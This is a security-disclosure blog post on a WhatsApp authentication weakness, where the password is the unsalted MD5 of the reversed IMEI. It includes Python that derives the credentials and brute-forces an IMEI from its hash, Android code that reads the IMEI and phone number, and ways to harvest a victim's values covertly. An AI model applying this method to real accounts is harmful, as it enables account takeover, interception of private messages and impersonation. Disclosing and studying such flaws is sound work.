As you have probably already heard in recent news, 1,000,001 Apple UDIDs were leaked. It is unfortunate that so many apps use UDIDs to identify users, since a UDID is a static, device-wide identifier: it cannot be changed or revoked, and every app on the device reads the same value, so anyone who obtains it can impersonate the device anywhere it is used as a credential.
This brings me to WhatsApp, a free messaging service used by millions of people. Their system runs on a modified version of XMPP (Extensible Messaging and Presence Protocol). There is nothing wrong with using XMPP, but there is a problem in how WhatsApp handles authentication.
If you installed WhatsApp on an Android device, for example, your password is most likely the reverse of your phone's IMEI number with an MD5 hash applied on top of it, without any salt: md5(reverse(IMEI)). Since the IMEI is neither secret nor changeable, this amounts to a fixed password derived from public data, and the unsalted hash adds nothing an attacker cannot reproduce.
When I say Android, I don't exclusively mean Android; it just happens that iOS is a different case. Windows Mobile, BlackBerry, etc. might very well use the same password method. It actually wouldn't surprise me. WhatsApp on the iPhone might be using your IMEI too, or maybe the UDID, to generate passwords, but not with exactly the same method. If I find out, I will update this post.
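As an added example (this is not code from the original post or from WhatsApp), the derivation the post describes, worked through in Python: the username is the phone number, the password is the unsalted MD5 of the reversed IMEI. The sample phone number is constructed, and the sample IMEI is the standard Luhn-valid textbook value, not a real device. The block also shows why the missing salt and the low-entropy input matter: an attacker who holds the hash and knows the handset model (the 8-digit TAC) only has to try the one million possible serial numbers to recover the IMEI, because the check digit is fixed by the Luhn formula.

```python
import hashlib
from typing import Optional, Tuple

# Constructed sample values: the IMEI is the well-known Luhn-valid example
# (TAC 49015420, serial 323751, check digit 8), not a real handset.
SAMPLE_IMEI = "490154203237518"
SAMPLE_PHONE = "+1 555 555 0123"


def luhn_check_digit(body: str) -> str:
    """Luhn check digit for a 14-digit IMEI body (TAC + serial)."""
    total = 0
    # Walk right to left; double every second digit, starting with the rightmost.
    for i, ch in enumerate(reversed(body)):
        d = int(ch)
        if i % 2 == 0:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return str((10 - total % 10) % 10)


def reverse_imei(imei: str) -> str:
    """The post's 'inverse' of the IMEI: the digit string reversed."""
    return imei[::-1]


def derive_password(imei: str) -> str:
    """Password as the post describes it for Android: unsalted MD5 of the reversed IMEI."""
    return hashlib.md5(reverse_imei(imei).encode("ascii")).hexdigest()


def credentials(phone: str, imei: str) -> Tuple[str, str]:
    """(username, password): the phone number's digits and the IMEI-derived password."""
    username = "".join(c for c in phone if c.isdigit())
    return username, derive_password(imei)


def recover_imei(password_hash: str, tac: str) -> Optional[str]:
    """Recover the IMEI from its password hash when the TAC (handset model) is known.

    With no salt and only six unknown serial digits, the search space is 10**6
    candidates; the Luhn check digit is computed, not guessed.
    """
    for serial in range(1_000_000):
        body = f"{tac}{serial:06d}"
        candidate = body + luhn_check_digit(body)
        if hashlib.md5(candidate[::-1].encode("ascii")).hexdigest() == password_hash:
            return candidate
    return None


if __name__ == "__main__":
    user, pw = credentials(SAMPLE_PHONE, SAMPLE_IMEI)
    print(f"username={user} password={pw}")
    print("recovered IMEI:", recover_imei(pw, SAMPLE_IMEI[:8]))
```

Run it and it prints the credential pair for the sample phone and then recovers the full sample IMEI from the hash alone, given only the TAC. The point is not the MD5 itself but that the input has far too little entropy to protect, and that salting would not have helped much either, since the IMEI is printed on the box.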
Then comes the username. It is your phone number (doh).
Obtaining both of these values is rather simple:
1. You have direct access to your victim's phone, in which case you dial *#06# (this works on most handsets) and the IMEI number is displayed.
2. You develop an app that silently sends the victim's IMEI number to your server in the background (many applications already do this) together with their phone number, either by having them fill it in themselves in a registration step of your app, or silently as well (this isn't always airtight, but it works in a lot of cases).
3. A hacker leaks a database or file of IMEI numbers with their associated phone numbers. Ding ding ding!
4. A spammer buys this information from an app developer.
Time for some Android code examples.
Android code to retrieve the IMEI number and the phone number. Both calls require the READ_PHONE_STATE permission, which is exactly why so many apps ask for it:
import android.content.Context;
import android.telephony.TelephonyManager;
// Needs <uses-permission android:name="android.permission.READ_PHONE_STATE" /> in the manifest.
TelephonyManager tm = (TelephonyManager) getSystemService(Context.TELEPHONY_SERVICE);
String deviceId = tm.getDeviceId();       // IMEI on GSM devices (MEID/ESN on CDMA)
String phoneNumber = tm.getLine1Number(); // may be null or empty if the SIM does not store the number
The same TelephonyManager can also hand you the user's voicemail number, just in case.
With these two values you can log in as the victim, which lets you intercept and send messages from their account.
This could mess up people's lives if you use their account to send a message to someone they know, with any kind of f'ed up content. This could cause huge problems for your victim, especially if the receiver of the message is mentally unstable. It might sound dramatic, but it is feasible.
You could intercept naked photos and other sensitive personal messages.
Alternatively, you could just spam the hell out of WhatsApp, especially if you have a nice big database.
Is this already happening? It wouldn’t surprise me if it is. I’ve succeeded in sending/receiving messages (from friends accounts who gave me permission to take their accounts over) and I’m not even a “hardcore hacker”.
Do you use WhatsApp? Think twice before you send a private WhatsApp message. Think twice when you receive a messed-up WhatsApp message. You don't know what's going on in the background.
And WhatsApp, if you are reading this, get your act together. People expect a secure system when it comes to personal messaging, and with the number of customers you have, you should be taking better security measures. I sincerely hope you fix this issue soon.
The intent of this blog post is not to give "hackers" or "script kiddies" any funny ideas, but merely to raise awareness.
PS. Don't get me wrong, I love WhatsApp. But it is far from "secure".
Want to talk along? Got any further questions? Comment below, or on Hacker News.
– UPDATE –
It seems that WhatsApp has made a change in their authentication system. I am not sure what they exactly changed, but if I find out more I will let you all know. My method no longer works.
– UPDATE 2 –
It looks like they didn’t change all that much…
– UPDATE 3 –
Ezio Amodio claims to have found how WhatsApp passwords are generated on iOS. I have yet to test it, but it sounds promising. http://www.ezioamodio.it/?p=29